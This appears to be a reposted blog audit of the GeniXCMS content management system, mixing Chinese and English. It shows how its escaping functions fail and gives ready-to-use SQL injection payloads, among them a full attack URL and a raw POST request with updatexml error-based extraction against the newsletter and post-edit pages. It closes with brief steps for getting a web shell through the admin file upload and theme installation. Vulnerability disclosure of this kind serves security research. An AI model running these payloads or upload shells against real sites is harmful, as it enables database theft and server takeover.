GeniXCMS审计之旅

看到松阔拿到了cve，于是我也想去审计尝试一下，都是一些超级简单的洞。

I found some unsafe method to cause a lot of problems.

I hope this helps you.

---

method issue

Db.class.php

Can see this in Db.class.php, You can see that escape is safe.
It is used in insert/update etc. But it is not used in select.

    public static function escape($vars)
    {
        if (DB_DRIVER == 'mysql') {
            $vars = mysql_escape_string($vars);

This program will generally use Typo::cleanX to deal with $_POST\$_GET

Typo.class.php

    public static function cleanX($c)
    {
        $val = self::strip_tags_content($c, '<script>', true);
        $val = htmlspecialchars(
            $val,
            ENT_QUOTES | ENT_HTML5,
            'utf-8'
        );
        return $val;
    }

It encodes the HTML character, But \ is not processed. So I can use \ to inject

function.htmlspecialchars

issue1

Tags.class.php

    public static function exist($tag)
    {
        $tag = Typo::cleanX($tag);
        $sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
        $q = Db::result($sql);
        // echo Db::$num_rows;
        if (Db::$num_rows > 0) {
            return true;
        } else {
            return false;
        }
    }

if $tag = and updatexml(1,(select version()),1)#\

SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'

it look like this:

SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);

issue2

Db.class.php

    public static function insert($vars)
    {
        if (is_array($vars)) {
            $set = '';
            $k = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "'{$val}',";
                $k .= "`{$key}`,";
            }

            $set = substr($set, 0, -1);
            $k = substr($k, 0, -1);

            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
            self::$last_id = mysql_insert_id();

here :

if (is_array($vars)) {
} else {
            $sql = $vars;
}

when $vars not is an array. This will cause security problems. Because $val = self::escape($val); cann't to exec.

Example:

/inc/lib/Control/Backend/categories.control.php

if (User::access(1)) {
    $data['sitetitle'] = CATEGORIES;
    switch (isset($_POST['addcat'])) {
        case true:
            // cleanup first
            $slug = Typo::slugify(Typo::cleanX($_POST['cat']));
            $cat = Typo::cleanX($_POST['cat']);

            if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
                // VALIDATE ALL
                $alertDanger[] = TOKEN_NOT_EXIST;
            }
            if (!isset($_POST['cat']) || $_POST['cat'] == '') {
                $alertDanger[] = CATEGORY_CANNOT_EMPTY;
            }
            if (isset($alertDanger)) {
                $data['alertDanger'] = $alertDanger;
            } else {
                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );
                //print_r($cat);
                $data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
            }
            if (isset($_POST['token'])) {
                Token::remove($_POST['token']);
            }
            break;

        default:
            break;
    }

here have safe issue:

                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );

Of course, update also has this problem.

[sql injection]

1. issue1:

   /inc/lib/Control/Backend/posts.control.php

   $data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");

   exp1:

   http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10

2. issue2:

   /inc/mod/newsletter/options.php

   $usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");

   exp2:

   POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1
   Host: lemon.love
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
   Accept-Encoding: gzip, deflate
   Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter
   Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 193
   
   subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa

后台getshell

1、windows
多媒体中上传1.php.，即可shell

2、通用
theme安装：上传zip文件
\inc\themes\shell\1\1.php

转载于:https://www.cnblogs.com/iamstudy/articles/6266268.html